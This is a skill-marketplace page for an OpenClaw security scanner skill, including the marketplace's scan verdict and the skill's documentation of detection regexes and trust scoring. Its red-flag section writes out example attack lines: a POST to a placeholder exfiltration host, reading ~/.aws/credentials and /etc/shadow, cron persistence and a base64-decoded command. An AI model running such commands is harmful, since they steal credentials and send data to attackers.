Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Skill Security Scanner

v1.0.1

Scan OpenClaw skills for security risks, suspicious permissions, and provide a trust score to help evaluate skill safety before use or installation.

2 stars · 825 downloads · 6 current · 7 all-time
by DevSef @steffano198
Security Scan
VirusTotal: Suspicious
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
The name and description match the contained files: a scanner that inspects skills. However the shipped scanner is very lightweight and only greps SKILL.md and metadata; it does not actually scan code files, binaries, or perform dynamic analysis despite implying a full-skill audit and trust scoring. Asking for no credentials and no special binaries is coherent for this purpose.
Instruction Scope
SKILL.md describes scanning strategies (network calls, credential reads, obfuscation) and example patterns, but the runnable script (scripts/scan-skill.sh) only searches the skill's SKILL.md for a handful of regexes and metadata lines. The documentation suggests examining full source and integrating with memory/other skills, but the automated checks do not analyze code files, dependencies, or runtime behavior — creating a risk of false negatives (malicious behavior hidden in other files) and false confidence.
Install Mechanism
No install spec and no external downloads; the repository is instruction-only with a small local shell script. This is low risk from an install perspective because nothing will be written or executed automatically on install. Running the included script executes only local greps and echoes.
Credentials
The skill requests no environment variables or credentials and does not attempt to read system files in the provided script. SKILL.md warns about sensitive files (e.g., ~/.aws/credentials) but only as examples of red flags. A small note: the docs recommend storing trust scores in 'memory' or reporting findings to other skills — that implies potential storage/sharing of scan results, but this is a user-level integration choice, not an automatic credential request.
Persistence & Privilege
always:false and normal model invocation settings are used. The SKILL.md suggests integrating with agent memory and other skills which could persist or share findings; that's not inherently malicious but users should be aware that trust scores and scan results might be stored or broadcast if they enable such integrations.
What to consider before installing
This skill is a useful, low-risk helper but be cautious: the automated script only inspects SKILL.md and metadata (it greps for network calls, env names, and markdown headings). It will miss malicious code in other files, hidden downloads, compiled binaries, or obfuscated scripts. Treat its trust score as a quick heuristic, not a definitive verdict. Before relying on it: (1) manually review code files (scripts, binaries, build/install steps), (2) run more comprehensive static-analysis tools across the whole skill directory, (3) sandbox test unknown skills (limited privileges/VM/container), and (4) avoid automatically sharing scan results to other services unless you trust those integrations. If the author/packaging is unfamiliar, prefer manual code review in addition to this scanner.

Like a lobster shell, security has layers — review code before you run it.

latest vk97e80j0txv0218rwsj71g0yb1819kf8
825 downloads
2 stars
2 versions
Updated 9h ago
v1.0.1
MIT-0

Skill Security Scanner

Scan OpenClaw skills for security issues, suspicious patterns, and give a trust score. Helps users make informed decisions about which skills to trust.

When to Use

  • Before installing a new skill from ClawHub
  • Auditing existing installed skills
  • User asks "is this skill safe?"
  • After ClawHavoc-type incidents (malicious skills in the ecosystem)
  • Before running untrusted skills

Quick Reference

| Command | Purpose |
|---------|---------|
| scan-skill <path> | Scan a single skill |
| scan-all | Scan all skills in workspace |
| trust-score <path> | Get quick trust score (0-100) |
| list-permissions <path> | List all requested permissions |

Scanning Strategy

1. Check Metadata (Frontmatter)

Look for:

  • bins - CLI tools skill needs
  • env - Environment variables (API keys, tokens)
  • requires.config - Required config settings
  • requires.bins - Binary dependencies

Red flags:

  • Skills requesting many bins without clear purpose
  • Env vars for sensitive services (AWS keys, database passwords)
  • Config requiring admin/elevated permissions

2. Analyze SKILL.md Content

Suspicious patterns to detect:

# Network calls to unknown domains
grep -E "(curl|wget|http|https).*\.com" SKILL.md
grep -E "fetch\(|axios\(" SKILL.md

# File system access beyond declared scope
grep -E "rm -rf|dd |mkfs" SKILL.md

# Credential access
grep -E "password|secret|token|key" SKILL.md

# Execution of downloaded code
grep -E "eval\(|exec\(|system\(" SKILL.md

# Base64 encoded commands
grep -E "base64|-enc|-encode" SKILL.md
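
The commands above look only at SKILL.md, so anything placed in a helper script or a compiled file goes unseen. The following added example (not the skill's own scripts/scan-skill.sh) applies the same regexes to every file in a skill directory and separately lists files containing NUL bytes; the function names and the fixture are hypothetical.

```shell
#!/bin/sh
# Added example: run the page's pattern categories over every file in a
# skill directory, not only SKILL.md. All names here are hypothetical.

# "<category> <extended regex>", regexes copied from the page's grep commands.
PATTERNS='network (curl|wget|http|https).*\.com
network fetch\(|axios\(
destructive rm -rf|dd |mkfs
credential password|secret|token|key
execution eval\(|exec\(|system\(
encoding base64|-enc|-encode'

# Print "<category><TAB><relative path>" for each file matching a category.
scan_skill_dir() (
    dir=${1%/}
    printf '%s\n' "$PATTERNS" | while read -r category regex; do
        grep -rlE -e "$regex" "$dir" 2>/dev/null | while read -r file; do
            printf '%s\t%s\n' "$category" "${file#"$dir"/}"
        done
    done | sort -u
)

# List files containing NUL bytes (compiled or packed content) so they get
# separate inspection; a clean regex pass says nothing about them.
list_opaque_files() (
    dir=${1%/}
    find "$dir" -type f | while read -r f; do
        tr -d '\000' < "$f" | cmp -s - "$f" || printf '%s\n' "${f#"$dir"/}"
    done | sort
)

# Constructed fixture: a clean SKILL.md next to a helper script and a blob.
make_fixture() (
    d=$(mktemp -d)
    mkdir "$d/scripts"
    printf '# Weather\nShows the forecast.\n' > "$d/SKILL.md"
    printf 'curl -s https://api.example.com/v1 | base64 -d\n' > "$d/scripts/helper.sh"
    printf 'MZ\000\001\002' > "$d/scripts/tool.bin"
    printf '%s\n' "$d"
)
```

The regexes are case-sensitive as written, so uppercase names such as `API_KEY` or `SECRET_TOKEN` do not match the credential pattern unless `-i` is added to the grep call.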

3. Trust Score Calculation

Score from 0-100 based on:

| Factor | Weight | Criteria |
|--------|--------|----------|
| Author reputation | 20% | Known author? Official OpenClaw skill? |
| Permission scope | 30% | Minimal bins/envs? |
| Code patterns | 25% | No suspicious commands |
| Update frequency | 15% | Recently updated? |
| Download count | 10% | Popular = more scrutiny |

4. Risk Levels

| Score | Risk | Action |
|-------|------|--------|
| 80-100 | 🟢 Low | Safe to use |
| 60-79 | 🟡 Medium | Review before use |
| 40-59 | 🟠 High | Use with caution |
| 0-39 | 🔴 Critical | Don't use |
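
An added example, not the skill's own code, of the weighted score and risk bands above in integer shell arithmetic. It assumes each factor is first rated 0-100 (the page does not say how), and it shows that a skill failing the code-pattern factor outright still averages to 75 (Medium); the cap at 39 in `capped_score` is an assumption added here to prevent that dilution.

```shell
#!/bin/sh
# Added example: weighted trust score from the page's factor table.
# Per-factor sub-scores (0-100) and the cap are assumptions, not the skill's.

# trust_score AUTHOR PERMISSIONS PATTERNS UPDATES DOWNLOADS -> prints 0..100
trust_score() (
    [ $# -eq 5 ] || { echo "need five sub-scores" >&2; exit 2; }
    for v in "$@"; do
        # Reject empty, non-numeric and leading-zero values (octal in $(( ))).
        case $v in ''|*[!0-9]*|0?*) echo "bad sub-score: $v" >&2; exit 2;; esac
        [ "$v" -le 100 ] || { echo "bad sub-score: $v" >&2; exit 2; }
    done
    # Weights from the page: 20% / 30% / 25% / 15% / 10% (sum 100).
    echo $(( ($1 * 20 + $2 * 30 + $3 * 25 + $4 * 15 + $5 * 10) / 100 ))
)

# Map a score to the page's risk bands.
risk_level() (
    s=$1
    if   [ "$s" -ge 80 ]; then echo "Low"
    elif [ "$s" -ge 60 ]; then echo "Medium"
    elif [ "$s" -ge 40 ]; then echo "High"
    else echo "Critical"
    fi
)

# capped_score <five sub-scores> HIGH_RISK_HITS
# Assumption: any high-risk pattern hit caps the result at 39 (Critical),
# so strong reputation or popularity cannot average a finding away.
capped_score() (
    score=$(trust_score "$1" "$2" "$3" "$4" "$5") || exit 2
    hits=$6
    if [ "$hits" -gt 0 ] && [ "$score" -gt 39 ]; then
        score=39
    fi
    echo "$score"
)
```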

Output Format

Scan Result

🔍 Skill: <skill-name>
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📊 Trust Score: <score>/100 (<risk-level>)

📋 Permissions Requested:
   • bins: curl, jq
   • env: OPENWEATHER_API_KEY

⚠️ Issues Found:
   1. [MEDIUM] Requests network access but no clear purpose
   2. [LOW] No recent updates (6+ months)

✅ Positive Signs:
   • Official OpenClaw skill
   • Clear documentation

Trust Report

Generate a full report:

## Security Analysis: <skill-name>

### Score: <score>/100 (<risk-level>)

### Permissions Analysis
| Type | Requested | Risk |
|------|-----------|------|
| bins | curl, jq | Low |
| env | API_KEY | Medium |

### Code Pattern Analysis
- ✅ No suspicious execution patterns
- ✅ No credential access attempts  
- ⚠️ 2 network calls to external domains

### Recommendation
<RECOMMENDATION>

Common Red Flags

High Risk Patterns

  1. Network exfiltration

    # Example: sending data to unknown servers
    # curl -X POST https://SUSPICIOUS-DOMAIN/exfil
    # fetch("https://data-collector.DOMAIN")
    
  2. Credential harvesting

    # Example: reading credentials
    # cat ~/.aws/credentials
    # grep "password" /etc/shadow
    
  3. Persistence mechanisms

    # Example: auto-start, cron, systemd
    # sudo crontab -l
    # systemctl enable
    
  4. Obfuscated code

    # Example: base64 encoded commands
    echo "c3VkbyByb20gL3J0ZiAv" | base64 -d
    

Medium Risk Patterns

  1. Excessive permissions - More bins/envs than needed
  2. No documentation - Unclear what skill does
  3. Outdated - No updates in 6+ months
  4. Third-party dependencies - Unknown npm/go packages

Green Flags

  1. ✅ Official OpenClaw skills (openclaw/skills)
  2. ✅ Clear, specific permissions
  3. ✅ Active maintenance (recent commits)
  4. ✅ Open source with clear code
  5. ✅ Known author with reputation

Workflows

Before Installing New Skill

# 1. Get skill path (ClawHub or local)
# 2. Run full scan
scan-skill /path/to/skill

# 3. Check trust score
trust-score /path/to/skill

# 4. Review issues
# 5. Decide: install / skip / investigate more

Regular Security Audit

# Weekly: scan all installed skills
scan-all

# Monthly: generate full report
# Save to .learnings/ for documentation

Quick Trust Check

# For quick decision
trust-score <path>

# If score < 60, do full scan
# If score < 40, don't use

Integration with Other Skills

  • Works with self-improving-agent - Log security findings
  • Use memory - Remember trust scores for known skills
  • Report findings to user before risky operations

Best Practices

  1. Always scan before installing untrusted skills
  2. Document scan results in .learnings/
  3. Share findings with community (anonymized)
  4. Update trust scores when vulnerabilities found
  5. Trust but verify - Don't rely solely on automated scanning

Examples

Example 1: Scanning Before Install

User wants to install "cool-new-skill" from ClawHub:

> scan-skill ./skills/cool-new-skill

🔍 Scanning: cool-new-skill
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📊 Trust Score: 72/100 (🟡 Medium)

📋 Permissions:
   • bins: none
   • env: none

⚠️ Issues:
   • No recent updates (8 months)
   • Unknown author

✅ Positives:
   • Clear documentation
   • Minimal permissions

💡 Recommendation: Safe to try, monitor usage

Example 2: Finding Malware

> scan-skill ./skills/suspicious-skill

🔍 Scanning: suspicious-skill
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📊 Trust Score: 23/100 (🔴 CRITICAL)

📋 Permissions:
   • bins: curl, base64
   • env: API_KEY, SECRET_TOKEN

🚨 CRITICAL ISSUES FOUND:
   1. Network exfiltration pattern detected
   2. Credential access attempt
   3. Obfuscated commands (base64)

💀 Recommendation: DO NOT USE - Potential malware

Example 3: Audit Report

> scan-all

📋 Scanning all skills in ~/.openclaw/workspace/skills/
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

✅ github: 95/100 (safe)
⚠️ todoist: 68/100 (review needed)
✅ self-improving-agent: 92/100 (safe)
🔴 unknown-skill: 34/100 (remove recommended)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Summary: 2 safe, 1 review, 1 remove

Related

  • ClawHavoc incident (Feb 2026) - 341 malicious skills
  • Agent Trust Hub - Third-party security tooling
  • OpenClaw Security docs: docs.openclaw.ai/gateway/security
